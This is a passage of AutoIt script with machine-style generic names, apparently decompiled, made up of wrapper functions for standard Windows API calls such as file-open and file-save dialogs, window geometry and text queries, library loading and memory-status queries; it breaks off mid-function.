  970. $ArgRef01=$Local000E [ 2 ]
  971. $ArgRef02=$Local000E [ 3 ]
  972. RETURN $Local000E [ 4 ]
  973. ENDFUNC
  974.  
  975. Func Fn005B($Arg00)
  976. LOCAL $Local002E ="wstr"
  977. IF $Arg00="" THEN
  978. $Arg00= 0
  979. $Local002E ="ptr"
  980. ENDIF
  981. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetModuleHandleW",$Local002E ,$Arg00)
  982. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  983. RETURN $Local000E [ 0 ]
  984. ENDFUNC
  985.  
  986. Func Fn005C($ArgOpt00=FALSE ,$ArgOpt01=0)
  987. LOCAL $Local0021 =OPT("MouseCoordMode", 1 )
  988. LOCAL $Local002F =MOUSEGETPOs()
  989. OPT("MouseCoordMode",$Local0021 )
  990. LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
  991. DLLSTRUCTSETDATA($Local0030 ,"X" ,$Local002F [ 0 ])
  992. DLLSTRUCTSETDATA($Local0030 ,"Y" ,$Local002F [ 1 ])
  993. IF $ArgOpt00 THEN
  994. Fn00A4($ArgOpt01,$Local0030 )
  995. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  996. ENDIF
  997. RETURN $Local0030
  998. ENDFUNC
  999.  
  1000. Func Fn005D($ArgOpt00=FALSE ,$ArgOpt01=0)
  1001. LOCAL $Local0030 =Fn005C($ArgOpt00,$ArgOpt01)
  1002. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1003. RETURN DLLSTRUCTGETDATA($Local0030 ,"X" )
  1004. ENDFUNC
  1005.  
  1006. Func Fn005E($ArgOpt00=FALSE ,$ArgOpt01=0)
  1007. LOCAL $Local0030 =Fn005C($ArgOpt00,$ArgOpt01)
  1008. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1009. RETURN DLLSTRUCTGETDATA($Local0030 ,"Y" )
  1010. ENDFUNC
  1011.  
  1012. Func Fn005F($Arg00,$Arg01,$Arg02)
  1013. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"int" ,"GetObjectW","handle" ,$Arg00,"int" ,$Arg01,"ptr" ,$Arg02)
  1014. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1015. RETURN $Local000E [ 0 ]
  1016. ENDFUNC
  1017.  
  1018. Func Fn0060($ArgOpt00="",$ArgOpt01="All files (*.*)",$Var0140 =".",$Var0141 ="",$Var0142 ="",$Var0143 =1,$Local00AB =0,$Var0144 =0,$Var0145 =0)
  1019. LOCAL $Local0031 =0x1000
  1020. LOCAL $Local0032 = 0
  1021. LOCAL $Local0033 =DLLSTRUCTCREATE($Var0146 )
  1022. LOCAL $Local0034 [ 1 ]=[ 0 ]
  1023. LOCAL $Local0035 =$Local00AB
  1024. LOCAL $Local0036 =STRINGSPLIT($ArgOpt01,"|" )
  1025. LOCAL $Local0037 [$Local0036 [ 0 ]* 2 + 1 ]
  1026. LOCAL $Local00BF ,$Var0147 ,$Var0148
  1027. $Local0037 [ 0 ]=$Local0036 [ 0 ]* 2
  1028. FOR $Local00EB = 1 TO $Local0036 [ 0 ]
  1029. $Local00BF =STRINGINSTR($Local0036 [$Local00EB ],"(" , 0 , 1 )
  1030. $Var0147 =STRINGINSTR($Local0036 [$Local00EB ],")" , 0 ,- 1 )
  1031. $Local0037 [$Local00EB * 2 - 1 ]=STRINGSTRIPWS(STRINGLEFT($Local0036 [$Local00EB ],$Local00BF - 1 ), 3 )
  1032. $Local0037 [$Local00EB * 2 ]=STRINGSTRIPWS(STRINGTRIMRIGHT(STRINGTRIMLEFT($Local0036 [$Local00EB ],$Local00BF ),STRINGLEN($Local0036 [$Local00EB ])-$Var0147 + 1 ), 3 )
  1033. $Var0148 &="wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 - 1 ])+ 1 &"];wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 ])+ 1 &"];"
  1034. NEXT
  1035. LOCAL $Local0038 =DLLSTRUCTCREATE("wchar Title["&STRINGLEN($ArgOpt00)+ 1 &"]" )
  1036. LOCAL $Local0039 =DLLSTRUCTCREATE("wchar InitDir["&STRINGLEN($Var0140 )+ 1 &"]" )
  1037. LOCAL $Local003A =DLLSTRUCTCREATE($Var0148 &"wchar" )
  1038. LOCAL $Local003B =DLLSTRUCTCREATE("wchar Path["&$Local0031 &"]" )
  1039. LOCAL $Local003C =DLLSTRUCTCREATE("wchar Extension["&STRINGLEN($Var0142 )+ 1 &"]" )
  1040. FOR $Local00EB = 1 TO $Local0037 [ 0 ]
  1041. DLLSTRUCTSETDATA($Local003A ,$Local00EB ,$Local0037 [$Local00EB ])
  1042. NEXT
  1043. DLLSTRUCTSETDATA($Local0038 ,"Title" ,$ArgOpt00)
  1044. DLLSTRUCTSETDATA($Local0039 ,"InitDir" ,$Var0140 )
  1045. DLLSTRUCTSETDATA($Local003B ,"Path" ,$Var0141 )
  1046. DLLSTRUCTSETDATA($Local003C ,"Extension" ,$Var0142 )
  1047. DLLSTRUCTSETDATA($Local0033 ,"StructSize",DLLSTRUCTGETSIZE($Local0033 ))
  1048. DLLSTRUCTSETDATA($Local0033 ,"hwndOwner" ,$Var0145 )
  1049. DLLSTRUCTSETDATA($Local0033 ,"lpstrFilter",DLLSTRUCTGETPTR($Local003A ))
  1050. DLLSTRUCTSETDATA($Local0033 ,"nFilterIndex",$Var0143 )
  1051. DLLSTRUCTSETDATA($Local0033 ,"lpstrFile" ,DLLSTRUCTGETPTR($Local003B ))
  1052. DLLSTRUCTSETDATA($Local0033 ,"nMaxFile" ,$Local0031 )
  1053. DLLSTRUCTSETDATA($Local0033 ,"lpstrInitialDir",DLLSTRUCTGETPTR($Local0039 ))
  1054. DLLSTRUCTSETDATA($Local0033 ,"lpstrTitle",DLLSTRUCTGETPTR($Local0038 ))
  1055. DLLSTRUCTSETDATA($Local0033 ,"Flags" ,$Local0035 )
  1056. DLLSTRUCTSETDATA($Local0033 ,"lpstrDefExt",DLLSTRUCTGETPTR($Local003C ))
  1057. DLLSTRUCTSETDATA($Local0033 ,"FlagsEx" ,$Var0144 )
  1058. DLLCALL("comdlg32.dll","bool" ,"GetOpenFileNameW","struct*" ,$Local0033 )
  1059. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,$Local0034 )
  1060. IF BITAND($Local00AB ,$Var00CA )=$Var00CA AND BITAND($Local00AB ,$Var00DA )=$Var00DA THEN
  1061. FOR $Var0149 = 1 TO $Local0031
  1062. IF DLLSTRUCTGETDATA($Local003B ,"Path" ,$Var0149 )=CHR( 0 )THEN
  1063. DLLSTRUCTSETDATA($Local003B ,"Path" ,"|" ,$Var0149 )
  1064. $Local0032 += 1
  1065. ELSE
  1066. $Local0032 = 0
  1067. ENDIF
  1068. IF $Local0032 = 2 THEN EXITLOOP
  1069. NEXT
  1070. DLLSTRUCTSETDATA($Local003B ,"Path" ,CHR( 0 ),$Var0149 - 1 )
  1071. $Local0034 =STRINGSPLIT(DLLSTRUCTGETDATA($Local003B ,"Path" ),"|" )
  1072. IF $Local0034 [ 0 ]= 1 THEN RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
  1073. RETURN STRINGSPLIT(DLLSTRUCTGETDATA($Local003B ,"Path" ),"|" )
  1074. ELSEIF BITAND($Local00AB ,$Var00CA )=$Var00CA THEN
  1075. $Local0034 =STRINGSPLIT(DLLSTRUCTGETDATA($Local003B ,"Path" )," " )
  1076. IF $Local0034 [ 0 ]= 1 THEN RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
  1077. RETURN STRINGSPLIT(STRINGREPLACE(DLLSTRUCTGETDATA($Local003B ,"Path" )," " ,"|" ),"|" )
  1078. ELSE
  1079. RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
  1080. ENDIF
  1081. ENDFUNC
  1082.  
  1083. Func Fn0061($Arg00,$Arg01,BYREF $ArgRef02,$ArgOpt03=FALSE )
  1084. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GetOverlappedResult","handle" ,$Arg00,"ptr" ,$Arg01,"dword*" , 0 ,"bool" ,$ArgOpt03)
  1085. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1086. $ArgRef02=$Local000E [ 3 ]
  1087. RETURN $Local000E [ 0 ]
  1088. ENDFUNC
  1089.  
  1090. Func Fn0062($Arg00)
  1091. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetParent" ,"hwnd" ,$Arg00)
  1092. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1093. RETURN $Local000E [ 0 ]
  1094. ENDFUNC
  1095.  
  1096. Func Fn0063($Arg00)
  1097. LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GetProcessAffinityMask","handle" ,$Arg00,"dword_ptr*", 0 ,"dword_ptr*", 0 )
  1098. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1099. LOCAL $Local003D [ 3 ]
  1100. $Local003D [ 0 ]=TRUE
  1101. $Local003D [ 1 ]=$Local000E [ 2 ]
  1102. $Local003D [ 2 ]=$Local000E [ 3 ]
  1103. RETURN $Local003D
  1104. ENDFUNC
  1105.  
  1106. Func Fn0064($ArgOpt00="",$ArgOpt01="All files (*.*)",$Var0140 =".",$Var0141 ="",$Var0142 ="",$Var0143 =1,$Local00AB =0,$Var0144 =0,$Var0145 =0)
  1107. LOCAL $Local0031 =0x1000
  1108. LOCAL $Local0033 =DLLSTRUCTCREATE($Var0146 )
  1109. LOCAL $Local0034 [ 1 ]=[ 0 ]
  1110. LOCAL $Local0035 =$Local00AB
  1111. LOCAL $Local0036 =STRINGSPLIT($ArgOpt01,"|" )
  1112. LOCAL $Local0037 [$Local0036 [ 0 ]* 2 + 1 ]
  1113. LOCAL $Local00BF ,$Var0147 ,$Var0148
  1114. $Local0037 [ 0 ]=$Local0036 [ 0 ]* 2
  1115. FOR $Local00EB = 1 TO $Local0036 [ 0 ]
  1116. $Local00BF =STRINGINSTR($Local0036 [$Local00EB ],"(" , 0 , 1 )
  1117. $Var0147 =STRINGINSTR($Local0036 [$Local00EB ],")" , 0 ,- 1 )
  1118. $Local0037 [$Local00EB * 2 - 1 ]=STRINGSTRIPWS(STRINGLEFT($Local0036 [$Local00EB ],$Local00BF - 1 ), 3 )
  1119. $Local0037 [$Local00EB * 2 ]=STRINGSTRIPWS(STRINGTRIMRIGHT(STRINGTRIMLEFT($Local0036 [$Local00EB ],$Local00BF ),STRINGLEN($Local0036 [$Local00EB ])-$Var0147 + 1 ), 3 )
  1120. $Var0148 &="wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 - 1 ])+ 1 &"];wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 ])+ 1 &"];"
  1121. NEXT
  1122. LOCAL $Local0038 =DLLSTRUCTCREATE("wchar Title["&STRINGLEN($ArgOpt00)+ 1 &"]" )
  1123. LOCAL $Local0039 =DLLSTRUCTCREATE("wchar InitDir["&STRINGLEN($Var0140 )+ 1 &"]" )
  1124. LOCAL $Local003A =DLLSTRUCTCREATE($Var0148 &"wchar" )
  1125. LOCAL $Local003B =DLLSTRUCTCREATE("wchar Path["&$Local0031 &"]" )
  1126. LOCAL $Local003C =DLLSTRUCTCREATE("wchar Extension["&STRINGLEN($Var0142 )+ 1 &"]" )
  1127. FOR $Local00EB = 1 TO $Local0037 [ 0 ]
  1128. DLLSTRUCTSETDATA($Local003A ,$Local00EB ,$Local0037 [$Local00EB ])
  1129. NEXT
  1130. DLLSTRUCTSETDATA($Local0038 ,"Title" ,$ArgOpt00)
  1131. DLLSTRUCTSETDATA($Local0039 ,"InitDir" ,$Var0140 )
  1132. DLLSTRUCTSETDATA($Local003B ,"Path" ,$Var0141 )
  1133. DLLSTRUCTSETDATA($Local003C ,"Extension" ,$Var0142 )
  1134. DLLSTRUCTSETDATA($Local0033 ,"StructSize",DLLSTRUCTGETSIZE($Local0033 ))
  1135. DLLSTRUCTSETDATA($Local0033 ,"hwndOwner" ,$Var0145 )
  1136. DLLSTRUCTSETDATA($Local0033 ,"lpstrFilter",DLLSTRUCTGETPTR($Local003A ))
  1137. DLLSTRUCTSETDATA($Local0033 ,"nFilterIndex",$Var0143 )
  1138. DLLSTRUCTSETDATA($Local0033 ,"lpstrFile" ,DLLSTRUCTGETPTR($Local003B ))
  1139. DLLSTRUCTSETDATA($Local0033 ,"nMaxFile" ,$Local0031 )
  1140. DLLSTRUCTSETDATA($Local0033 ,"lpstrInitialDir",DLLSTRUCTGETPTR($Local0039 ))
  1141. DLLSTRUCTSETDATA($Local0033 ,"lpstrTitle",DLLSTRUCTGETPTR($Local0038 ))
  1142. DLLSTRUCTSETDATA($Local0033 ,"Flags" ,$Local0035 )
  1143. DLLSTRUCTSETDATA($Local0033 ,"lpstrDefExt",DLLSTRUCTGETPTR($Local003C ))
  1144. DLLSTRUCTSETDATA($Local0033 ,"FlagsEx" ,$Var0144 )
  1145. DLLCALL("comdlg32.dll","bool" ,"GetSaveFileNameW","struct*" ,$Local0033 )
  1146. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,$Local0034 )
  1147. RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
  1148. ENDFUNC
  1149.  
  1150. Func Fn0065($Arg00)
  1151. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"GetStockObject","int" ,$Arg00)
  1152. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1153. RETURN $Local000E [ 0 ]
  1154. ENDFUNC
  1155.  
  1156. Func Fn0066($Arg00)
  1157. IF $Arg00< 0 OR $Arg00> 2 THEN RETURN SETERROR( 2 , 0 ,- 1 )
  1158. LOCAL CONST $Var014A [ 3 ]=[- 10 ,-0x000B ,-0x000C ]
  1159. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetStdHandle","dword" ,$Var014A [$Arg00])
  1160. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
  1161. RETURN $Local000E [ 0 ]
  1162. ENDFUNC
  1163.  
  1164. Func Fn0067($Arg00)
  1165. LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetSysColor","int" ,$Arg00)
  1166. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1167. RETURN $Local000E [ 0 ]
  1168. ENDFUNC
  1169.  
  1170. Func Fn0068($Arg00)
  1171. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetSysColorBrush","int" ,$Arg00)
  1172. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1173. RETURN $Local000E [ 0 ]
  1174. ENDFUNC
  1175.  
  1176. Func Fn0069($Arg00)
  1177. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetSystemMetrics","int" ,$Arg00)
  1178. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1179. RETURN $Local000E [ 0 ]
  1180. ENDFUNC
  1181.  
  1182. Func Fn006A($Arg00,$Arg01)
  1183. LOCAL $Local003E =DLLSTRUCTCREATE($Var014B )
  1184. LOCAL $Local003F =STRINGLEN($Arg01)
  1185. DLLCALL("gdi32.dll" ,"bool" ,"GetTextExtentPoint32W","handle" ,$Arg00,"wstr" ,$Arg01,"int" ,$Local003F ,"struct*" ,$Local003E )
  1186. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1187. RETURN $Local003E
  1188. ENDFUNC
  1189.  
  1190. Func Fn006B($Arg00)
  1191. LOCAL $Local0040 =DLLSTRUCTCREATE($Var014C )
  1192. LOCAL $Local0041 =DLLCALL("gdi32.dll" ,"bool" ,"GetTextMetricsW","handle" ,$Arg00,"struct*" ,$Local0040 )
  1193. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1194. IF NOT $Local0041 [ 0 ]THEN RETURN SETERROR(- 1 , 0 , 0 )
  1195. RETURN $Local0040
  1196. ENDFUNC
  1197.  
  1198. Func Fn006C($Arg00,$Arg01)
  1199. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetWindow" ,"hwnd" ,$Arg00,"uint" ,$Arg01)
  1200. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1201. RETURN $Local000E [ 0 ]
  1202. ENDFUNC
  1203.  
  1204. Func Fn006D($Arg00)
  1205. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetWindowDC","hwnd" ,$Arg00)
  1206. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1207. RETURN $Local000E [ 0 ]
  1208. ENDFUNC
  1209.  
  1210. Func Fn006E($Arg00)
  1211. LOCAL $Local0017 =Fn0071($Arg00)
  1212. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1213. RETURN DLLSTRUCTGETDATA($Local0017 ,"Bottom" )-DLLSTRUCTGETDATA($Local0017 ,"Top" )
  1214. ENDFUNC
  1215.  
  1216. Func Fn006F($Arg00,$Arg01)
  1217. LOCAL $Local0042 ="GetWindowLongW"
  1218. IF @AutoItX64 THEN $Local0042 ="GetWindowLongPtrW"
  1219. LOCAL $Local000E =DLLCALL("user32.dll","long_ptr" ,$Local0042 ,"hwnd" ,$Arg00,"int" ,$Arg01)
  1220. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1221. RETURN $Local000E [ 0 ]
  1222. ENDFUNC
  1223.  
  1224. Func Fn0070($Arg00)
  1225. LOCAL $Local0043 =DLLSTRUCTCREATE($Var014D )
  1226. DLLSTRUCTSETDATA($Local0043 ,"length" ,DLLSTRUCTGETSIZE($Local0043 ))
  1227. DLLCALL("user32.dll","bool" ,"GetWindowPlacement","hwnd" ,$Arg00,"struct*" ,$Local0043 )
  1228. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1229. RETURN $Local0043
  1230. ENDFUNC
  1231.  
  1232. Func Fn0071($Arg00)
  1233. LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
  1234. DLLCALL("user32.dll","bool" ,"GetWindowRect","hwnd" ,$Arg00,"struct*" ,$Local0017 )
  1235. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1236. RETURN $Local0017
  1237. ENDFUNC
  1238.  
  1239. Func Fn0072($Arg00,$Arg01)
  1240. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetWindowRgn","hwnd" ,$Arg00,"handle" ,$Arg01)
  1241. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1242. RETURN $Local000E [ 0 ]
  1243. ENDFUNC
  1244.  
  1245. Func Fn0073($Arg00)
  1246. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetWindowTextW","hwnd" ,$Arg00,"wstr" ,"","int" ,0x1000 )
  1247. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1248. RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 2 ])
  1249. ENDFUNC
  1250.  
  1251. Func Fn0074($Arg00,BYREF $ArgRef01)
  1252. LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetWindowThreadProcessId","hwnd" ,$Arg00,"dword*" , 0 )
  1253. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1254. $ArgRef01=$Local000E [ 2 ]
  1255. RETURN $Local000E [ 0 ]
  1256. ENDFUNC
  1257.  
  1258. Func Fn0075($Arg00)
  1259. LOCAL $Local0017 =Fn0071($Arg00)
  1260. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1261. RETURN DLLSTRUCTGETDATA($Local0017 ,"Right" )-DLLSTRUCTGETDATA($Local0017 ,"Left" )
  1262. ENDFUNC
  1263.  
  1264. Func Fn0076(BYREF $ArgRef00,BYREF $ArgRef01,BYREF $ArgRef02)
  1265. $ArgRef01=DLLSTRUCTGETDATA($ArgRef00,"X" )
  1266. $ArgRef02=DLLSTRUCTGETDATA($ArgRef00,"Y" )
  1267. ENDFUNC
  1268.  
  1269. Func Fn0077()
  1270. LOCAL $Local0044 =DLLSTRUCTCREATE($Var0115 )
  1271. LOCAL $Local0045 =DLLSTRUCTGETSIZE($Local0044 )
  1272. DLLSTRUCTSETDATA($Local0044 , 1 ,$Local0045 )
  1273. DLLCALL("kernel32.dll","none" ,"GlobalMemoryStatusEx","ptr" ,$Local0044 )
  1274. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1275. LOCAL $Local0046 [ 7 ]
  1276. $Local0046 [ 0 ]=DLLSTRUCTGETDATA($Local0044 , 2 )
  1277. $Local0046 [ 1 ]=DLLSTRUCTGETDATA($Local0044 , 3 )
  1278. $Local0046 [ 2 ]=DLLSTRUCTGETDATA($Local0044 , 4 )
  1279. $Local0046 [ 3 ]=DLLSTRUCTGETDATA($Local0044 , 5 )
  1280. $Local0046 [ 4 ]=DLLSTRUCTGETDATA($Local0044 , 6 )
  1281. $Local0046 [ 5 ]=DLLSTRUCTGETDATA($Local0044 , 7 )
  1282. $Local0046 [ 6 ]=DLLSTRUCTGETDATA($Local0044 , 8 )
  1283. RETURN $Local0046
  1284. ENDFUNC
  1285.  
  1286. Func Fn0078($Arg00)
  1287. LOCAL $Local0047 =DLLSTRUCTCREATE($Var014E )
  1288. Fn0079($Arg00,$Local0047 )
  1289. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1290. RETURN $Local0047
  1291. ENDFUNC
  1292.  
  1293. Func Fn0079($Arg00,$Arg01)
  1294. LOCAL $Local000E =DLLCALL("ole32.dll" ,"long" ,"CLSIDFromString","wstr" ,$Arg00,"struct*" ,$Arg01)
  1295. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1296. RETURN $Local000E [ 0 ]
  1297. ENDFUNC
  1298.  
  1299. Func Fn007A($Arg00)
  1300. RETURN BITSHIFT($Arg00,0x0010 )
  1301. ENDFUNC
  1302.  
  1303. Func Fn007B($Arg00,BYREF $ArgRef01)
  1304. IF $Arg00=$ArgRef01 THEN RETURN TRUE
  1305. FOR $Var014F =$Var001D [ 0 ][ 0 ]TO 1 STEP - 1
  1306. IF $Arg00=$Var001D [$Var014F ][ 0 ]THEN
  1307. IF $Var001D [$Var014F ][ 1 ]THEN
  1308. $ArgRef01=$Arg00
  1309. RETURN TRUE
  1310. ELSE
  1311. RETURN FALSE
  1312. ENDIF
  1313. ENDIF
  1314. NEXT
  1315. LOCAL $Local0070
  1316. Fn0074($Arg00,$Local0070 )
  1317. LOCAL $Local001D =$Var001D [ 0 ][ 0 ]+ 1
  1318. IF $Local001D >=0x0040 THEN $Local001D = 1
  1319. $Var001D [ 0 ][ 0 ]=$Local001D
  1320. $Var001D [$Local001D ][ 0 ]=$Arg00
  1321. $Var001D [$Local001D ][ 1 ]=($Local0070 = @AutoItPID )
  1322. RETURN $Var001D [$Local001D ][ 1 ]
  1323. ENDFUNC
  1324.  
  1325. Func Fn007C($Arg00)
  1326. LOCAL $Local0023 =DLLSTRUCTCREATE("int" )
  1327. LOCAL $Local0022 =DLLSTRUCTCREATE("float" ,DLLSTRUCTGETPTR($Local0023 ))
  1328. DLLSTRUCTSETDATA($Local0023 , 1 ,$Arg00)
  1329. RETURN DLLSTRUCTGETDATA($Local0022 , 1 )
  1330. ENDFUNC
  1331.  
  1332. Func Fn007D($Arg00,$Arg01)
  1333. LOCAL $Local0048 =OPT("GUIDataSeparatorChar")
  1334. LOCAL $Local0049 =STRINGSPLIT($Arg01,$Local0048 )
  1335. IF NOT ISHWND($Arg00)THEN $Arg00=GUICTRLGETHANDLE($Arg00)
  1336. LOCAL $Local004A =Fn0045($Arg00)
  1337. FOR $Var0149 = 1 TO UBOUND($Local0049 )- 1
  1338. IF STRINGUPPER(STRINGMID($Local004A , 1 ,STRINGLEN($Local0049 [$Var0149 ])))=STRINGUPPER($Local0049 [$Var0149 ])THEN RETURN TRUE
  1339. NEXT
  1340. RETURN FALSE
  1341. ENDFUNC
  1342.  
  1343. Func Fn007E($Arg00)
  1344. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"IsWindow" ,"hwnd" ,$Arg00)
  1345. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1346. RETURN $Local000E [ 0 ]
  1347. ENDFUNC
  1348.  
  1349. Func Fn007F($Arg00)
  1350. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"IsWindowVisible","hwnd" ,$Arg00)
  1351. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1352. RETURN $Local000E [ 0 ]
  1353. ENDFUNC
  1354.  
  1355. Func Fn0080($Arg00,$ArgOpt01=0,$ArgOpt02=TRUE )
  1356. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"InvalidateRect","hwnd" ,$Arg00,"struct*" ,$ArgOpt01,"bool" ,$ArgOpt02)
  1357. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1358. RETURN $Local000E [ 0 ]
  1359. ENDFUNC
  1360.  
  1361. Func Fn0081($Arg00,$Arg01,$Arg02)
  1362. LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"LineTo" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02)
  1363. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1364. RETURN $Local000E [ 0 ]
  1365. ENDFUNC
  1366.  
  1367. Func Fn0082($Arg00,$Arg01)
  1368. LOCAL $Local004B ="int"
  1369. IF ISSTRING($Arg01)THEN $Local004B ="wstr"
  1370. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"LoadBitmapW","handle" ,$Arg00,$Local004B ,$Arg01)
  1371. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1372. RETURN $Local000E [ 0 ]
  1373. ENDFUNC
  1374.  
  1375. Func Fn0083($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
  1376. LOCAL $Local000E ,$Var0150 ="int"
  1377. IF ISSTRING($Arg01)THEN $Var0150 ="wstr"
  1378. $Local000E =DLLCALL("user32.dll","handle" ,"LoadImageW","handle" ,$Arg00,$Var0150 ,$Arg01,"uint" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"uint" ,$Arg05)
  1379. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1380. RETURN $Local000E [ 0 ]
  1381. ENDFUNC
  1382.  
  1383. Func Fn0084($Arg00)
  1384. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"LoadLibraryW","wstr" ,$Arg00)
  1385. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1386. RETURN $Local000E [ 0 ]
  1387. ENDFUNC
  1388.  
  1389. Func Fn0085($Arg00,$ArgOpt01=0)
  1390. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"LoadLibraryExW","wstr" ,$Arg00,"ptr" , 0 ,"dword" ,$ArgOpt01)
  1391. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1392. RETURN $Local000E [ 0 ]
  1393. ENDFUNC
  1394.  
  1395. Func Fn0086($Arg00)
  1396. LOCAL $Local004C =DLLSTRUCTCREATE("ptr Data" )
  1397. LOCAL $Local004D =Fn0036("shell32.dll",$Arg00, 0 ,$Local004C , 1 )
  1398. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  1399. IF $Local004D <= 0 THEN RETURN SETERROR( 1 , 0 , 0 )
  1400. RETURN DLLSTRUCTGETDATA($Local004C ,"Data" )
  1401. ENDFUNC
  1402.  
  1403. Func Fn0087($Arg00,$Arg01)
  1404. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"LoadStringW","handle" ,$Arg00,"uint" ,$Arg01,"wstr" ,"","int" ,0x1000 )
  1405. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1406. RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 3 ])
  1407. ENDFUNC
  1408.  
  1409. Func Fn0088($Arg00)
  1410. LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"LocalFree" ,"handle" ,$Arg00)
  1411. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1412. RETURN $Local000E [ 0 ]
  1413. ENDFUNC
  1414.  
  1415. Func Fn0089($Arg00)
  1416. RETURN BITAND($Arg00,0xFFFF )
  1417. ENDFUNC
  1418.  
  1419. Func Fn008A($Arg00,$Arg01)
  1420. RETURN BITOR(BITSHIFT($Arg01,- 10 ),$Arg00)
  1421. ENDFUNC
  1422.  
  1423. Func Fn008B($Arg00,$Arg01)
  1424. RETURN BITOR(BITSHIFT($Arg01,-0x0010 ),$Arg00)
  1425. ENDFUNC
  1426.  
  1427. Func Fn008C($Arg00,$Arg01)
  1428. RETURN BITOR(BITSHIFT($Arg01,-0x0010 ),BITAND($Arg00,0xFFFF ))
  1429. ENDFUNC
  1430.  
  1431. Func Fn008D($Arg00,$Arg01)
  1432. LOCAL $Local004E =DLLSTRUCTCREATE("uint64" )
  1433. LOCAL $Local004F =DLLSTRUCTCREATE("dword;dword",DLLSTRUCTGETPTR($Local004E ))
  1434. DLLSTRUCTSETDATA($Local004F , 1 ,$Arg00)
  1435. DLLSTRUCTSETDATA($Local004F , 2 ,$Arg01)
